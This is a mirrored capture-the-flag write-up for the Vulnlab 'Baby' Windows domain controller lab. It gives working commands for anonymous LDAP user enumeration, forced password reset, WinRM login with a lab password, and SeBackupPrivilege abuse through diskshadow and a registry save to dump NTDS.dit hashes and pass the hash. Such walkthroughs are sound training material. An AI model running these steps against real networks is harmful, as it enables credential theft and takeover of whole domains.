Mirrors/CTF-Writeups
2
0
Fork 0
mirror of https://github.com/AbdullahRizwan101/CTF-Writeups synced 2025-02-17 20:48:24 +00:00
Code Issues Projects Releases Packages Wiki Activity
CTF-Writeups/Vulnlab/Baby.md
ARZ e18ee2010f
Create Baby.md
2023-06-17 23:13:40 +03:00

4.8 KiB
Raw Blame History

Vulnlab - Baby

NMAP

Nmap scan report for 10.10.83.40     
Host is up (0.081s latency).                
Not shown: 65523 filtered tcp ports (no-response)
PORT      STATE SERVICE    VERSION
53/tcp    open  domain     Simple DNS Plus
135/tcp   open  tcpwrapped
139/tcp   open  tcpwrapped     
389/tcp   open  tcpwrapped
445/tcp   open  tcpwrapped
593/tcp   open  tcpwrapped
3268/tcp  open  tcpwrapped
3389/tcp  open  tcpwrapped
| ssl-cert: Subject: commonName=BabyDC.baby.vl
| Issuer: commonName=BabyDC.baby.vl
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2023-06-16T16:00:59
| Not valid after:  2023-12-16T16:00:59
| MD5:   55aa85b5f2fd316af5fbb1c8ad357d53
|_SHA-1: ae0ab02e5de2d54a9180931ff745d5a00deb41a2
|_ssl-date: 2023-06-17T16:09:48+00:00; +24s from scanner time.
5985/tcp  open  tcpwrapped
49664/tcp open  tcpwrapped
60083/tcp open  tcpwrapped
65331/tcp open  ncacn_http Microsoft Windows RPC over HTTP 1.0
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

PORT 445 (SMB)

Enumerating smb shares with anonymous user it doesn't allow us to either list or read shares being unauthenticated

We can move on to ldap which is running on port 389

PORT 389 (LDAP)

On checking ldap with null authentication

ldapsearch -x -H ldap://10.10.83.40 -D '' -w '' -b "DC=baby,DC=vl"

This starts to return us usernames

We can use grep to filter for usernames

ldapsearch -x -H ldap://10.10.83.40 -D '' -w '' -b "DC=baby,DC=vl" | grep sAMAccountName | awk -F: '{ print $2 }' |  awk '{ gsub(/ /,""); print }'
With `kerbrute` we can verify domain users which also perform AS-REP roasting but here it didn't found any domain user with pre-authentication disabled

We can grep for user descriptions where on Teresa.Bell 's password was found from it's description

But using this password for Teresa failed as this password doesn't belong to her

Spraying this password across the domain didn't worked as well

Foothold (Connor.Wilkinson)

So going back to ldap, there was a userCaroline.Robinson which didn't had any attributes thus didn't get covered when it was getting filtered with sAMAccountName

For this username the password is valid but it needs to be changed

We can change her password by using impacket's `smbpasswd` by referring to this article

https://exploit-notes.hdks.org/exploit/windows/active-directory/smb-pentesting/

smbpasswd -U Caroline.Robinson -r 10.10.83.40

We can try authenticating on WinRM to see if this user is in remote desktop group

It shows Pwn3d! status which means we can login through WinRM

evil-winrm -i 10.10.83.40 -u 'Caroline.Robinson' -p 'BabyStart12345$Abc#!'

Checking the privileges of this account with whoami /all we have SeBackupPrivilege privilege

Caroline's password will keep getting revert back as there was a script running, so you'll need to change the password again

Privilege Escalation (Administrator)

Following this article to abuse SeBackupPrivilege

https://www.hackingarticles.in/windows-privilege-escalation-sebackupprivilege/

Create a dsh script file and convert it to dos format with unix2dos

set context persistent nowriters
add volume c: alias owo
create
expose %owo% z:

Now with robocop, copying NTDS.dit file in current directory

Downloading the file on to our kali machine

After downloading the file we'll have ntds.dit

We'll also need SYSTEM file

reg save hklm\system C:\Windows\Temp\system

Having this file, we'll be able to parse through NTDS.dit file to dump hashes and get the administrator's hash

Now with pass the hash we'll be able to login as administrator

References